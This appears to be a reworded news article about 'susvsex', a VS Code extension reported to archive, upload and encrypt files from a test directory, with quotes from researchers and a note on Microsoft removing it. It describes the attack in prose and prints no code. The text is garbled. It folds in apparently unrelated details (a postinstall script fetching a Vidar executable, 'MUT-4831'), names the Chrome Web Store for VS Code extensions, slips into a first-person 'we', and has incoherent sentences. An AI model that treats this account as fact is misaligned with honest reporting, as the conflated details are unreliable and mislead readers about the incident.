A new truly evil extension for Visual Studio Code has recently appeared. To build this, named “susvsex,” it has built-in ransomware capabilities that sound alarm bells on security. Uploaded on November 5, 2025 by a user going by “FIRE SUS SUCKER,” the extension’s description was as follows, “Just testing.” While this unassuming description may sound harmless, it actually hides a dark purpose that allows user files to be exfiltrated and encrypted.
To do this, the extension simply creates a ZIP archive of the target directory. It then exfiltrates this archive as a single file to a remote server. Once this process is done, “susvsex” overwrites the original files with their encrypted counterparts. This alarming behavior suggests that the extension was designed for malicious purposes from the outset, raising questions about its origins and intentions.
Details of the Malicious Functionality
As referred earlier, the purpose of “susvsex” is better understood once we look at its attack chain. Once installed, the extension uses a postinstall script to download a ZIP archive with a Vidar executable from an external server. This first step sets the stage for the rest of the ransomware’s work.
“Automatically zips, uploads, and encrypts files from C:\Users\Public\testing (Windows) or /tmp/testing (macOS) on first launch.” – John Tuckner
According to security researchers, the ZIP archive that “susvsex” generates holds the actual payload. It contains decryption tools and source code for command and control server. This accidental inclusion alone begs even more questions regarding the developer’s competence or intent.
“Extraneous comments which detail functionality, README files with execution instructions, and placeholder variables are clear signs of ‘vibe-coded’ malware.” – John Tuckner
The extension’s GitHub repository is under the account of “aykhanmv.” The developer purports to be located in Baku, Azerbaijan. The email address for user “suspublisher18” is donotsupport@example.com. This decision further increases their anonymity and adds to the question of the developer’s trustworthiness.
Rapid Response and Removal
Microsoft moved swiftly upon finding out about “susvsex.” Despite all of this, Microsoft removed the extension from the official VS Code Extension Marketplace on November 6 — one day after uploading it to the Marketplace. This swift response is a testament to the discussion of cyber preparedness, risks, and threats that dread shiny new things.
Here’s what security experts have said about the tactics used by the creator of “susvsex.” Analysts Tesnim Hamdouni, Ian Kretz, and Sebastian Obregaso noted:
“It is not clear why MUT-4831 chose to vary the postinstall script in this way.”
In their work, they proposed that implementing heterogeneous designs can give powerful benefits to threat actors by helping them to avoid being detected by security countermeasures.
Implications for Developers and Users
The rise of “susvsex” is just the latest reminder of how vulnerable even the most trusted software ecosystems can be. Protecting yourself Developers should be on the lookout for extensions, especially those outside of the Chrome Web Store. In addition, one change we made to minimize acute risk was setting the TARGET_DIRECTORY to a test staging directory for file manipulation. Subsequent updates or instructions dispatched over the command and control channel might just as quickly alter that behavior.
“Fortunately, the TARGET_DIRECTORY is configured to be a test staging directory so it would have little impact right now, but is easily updated with an extension release or as a command sent through the C2 channel covered next.” – John Tuckner
As AI plays a larger role in software development, we’ve given life to concerns about the technology falling into the hands of malicious actors. The concepts shown by “susvsex” remind us of the need for careful vetting of extensions.